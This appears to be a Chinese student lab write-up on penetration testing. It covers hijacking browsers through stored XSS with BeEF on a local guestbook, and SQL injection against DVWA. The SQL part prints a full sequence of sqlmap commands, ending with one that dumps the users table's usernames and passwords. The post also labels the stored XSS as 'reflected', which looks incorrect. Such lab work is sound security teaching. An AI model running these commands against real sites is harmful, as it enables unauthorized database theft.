网络渗透测试学习三之XSS和SQL注入

实验目的:

了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;了解SQL注入的基本原理;掌握PHP脚本访问MySQL数据库的基本方法;掌握程序设计中避免出现SQL注入漏洞的基本方法;掌握网站配置。

系统环境:Kali Linux 2、Windows Server

网络环境:交换网络结构

实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA

实验步骤:

XSS部分:利用Beef劫持被攻击者客户端浏览器。

实验环境搭建:

角色:留言簿网站。存在XSS漏洞;(IIS或Apache、guestbook搭建)

这里我在本地搭建了一个IIS用来进行实验。参考网站

攻击者:Kali(使用beEF生成恶意代码,并通过留言方式提交到留言簿网站);
被攻击者劫持。
1、利用AWVS扫描留言簿网站(安装见参考文档0.AWVS安装与使用.docx),发现其存在XSS漏洞,截图。
网络渗透测试学习三之XSS和SQL注入

2、 Kali使用beef生成恶意代码,截图。
网络渗透测试学习三之XSS和SQL注入

3、访问http://留言簿网站/message.asp;将以下恶意代码写入网站留言板,

,截图。

网络渗透测试学习三之XSS和SQL注入

4、管理员登录login.htm,账号密码均为admin,审核用户留言。只要客户端访问这个服务器的留言板,客户端浏览器就会被劫持,指定被劫持网站为学校主页,将你在beff中的配置截图。
网络渗透测试学习三之XSS和SQL注入
网络渗透测试学习三之XSS和SQL注入

5、回答问题:实验中XSS攻击属于哪种类型?

XSS属于反射型攻击。

SQL注入部分:DVWA+SQLmap+Mysql注入实战

实验环境搭建。启动Metasploitable2虚拟机。
1、注入点发现。首先肯定是要判断是否有注入漏洞。
在输入框输入1,返回
网络渗透测试学习三之XSS和SQL注入

ID: 1
First name: admin
Surname: admin
返回正常;

再次输入1’,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1

此时可以断定有SQL注入漏洞,
http://IP地址/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#

下面利用SQLMap进行注入攻击。将DVWA安全级别设置为最低;

2、枚举当前使用的数据库名称和-用户名。
网络渗透测试学习三之XSS和SQL注入

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” --current-db --current-user
网络渗透测试学习三之XSS和SQL注入

3、枚举数据库用户名和密码
网络渗透测试学习三之XSS和SQL注入

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” --users --password

网络渗透测试学习三之XSS和SQL注入

4、枚举数据库
–dbs:枚举当前数据库

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” --dbs
网络渗透测试学习三之XSS和SQL注入

5、枚举数据库和指定数据库的数据表
-D 数据库名:指定数据库
–tables:枚举指定数据库的所有表

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” -D “dvwa” --tables

网络渗透测试学习三之XSS和SQL注入

6、获取指定数据库和表中所有列的信息
-D:指定的数据库
-T:指定数据库中的数据表
–columns:获取列的信息

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” -D “dvwa” -T users --columns
网络渗透测试学习三之XSS和SQL注入

7、枚举指定数据表中的所有用户名与密码,并down到本地。
-C:枚举数据表中的列
–dump:存储数据表项

你输入的命令:sqlmap -u “http://192.168.31.25/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low; PHPSESSID=291830831045069edff707ed7b99111e” -D “dvwa” -T users -C “user_id,user,password” --dump
网络渗透测试学习三之XSS和SQL注入
网络渗透测试学习三之XSS和SQL注入

tips : 查看down到本地的用户名与密码,截图。(提示带.的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件合文件夹,再按一次取消显示。)

因为做实验的时候连续几次做完都忘记截屏导致很烦躁…就省略着放图了 …再此提醒各位做实验的过程中要注意ip地址的填写…我就是因为ip地址填错而浪费了很多时间…如有问题欢迎指出…也欢迎在评论区留言。

相关文章:

  • 2021-04-07
  • 2021-11-25
  • 2022-12-23
  • 2022-12-23
  • 2021-10-15
  • 2021-05-23
  • 2021-11-29
  • 2022-01-09
猜你喜欢
  • 2021-04-20
  • 2021-12-23
  • 2021-10-08
  • 2021-11-24
  • 2022-12-23
  • 2022-12-23
  • 2021-08-08
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode